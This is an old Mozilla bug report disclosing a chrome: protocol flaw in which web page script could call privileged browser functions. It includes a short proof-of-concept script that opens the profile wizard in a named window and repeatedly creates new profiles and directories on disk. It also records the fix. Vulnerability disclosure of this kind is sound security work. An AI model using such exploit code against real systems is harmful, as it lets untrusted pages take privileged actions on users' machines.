Closed Bug 21923 Opened 26 years ago Closed 26 years ago

Executing functions in "chrome:" protocol - #2.

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking


VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)


Details

There is another chrome vulnerability, which allows executing JavaScript functions in the "chrome:" protocol. This is dangerous because such functions have much more privileges than JavaScript functions loaded from a web page. If one opens a "chrome:" url in a window, he has access to all functions in the window and the functions are executed by "windowname.functionname()" in the "chrome:" protocol. Some of the predefined functions in the Mozilla chrome may do dangerous things. The code is:
----------------------------------------------------------------------
<SCRIPT>
b=window.open("","victim");
function g()
{
  b.profile.createNewProfile("georgi","c:\\georgi\\");
  alert("Profile created! You'd better close this window because directories are created");
}
setInterval("g()",4000);
</SCRIPT>
<A HREF="chrome://profile/content/createProfileWizard.xul" TARGET="victim">Follow this link for demonstration</A>
----------------------------------------------------------------------
Status: NEW → ASSIGNED
Target Milestone: M13
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
Added call to CheckLoadURI from TriggerLink.
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General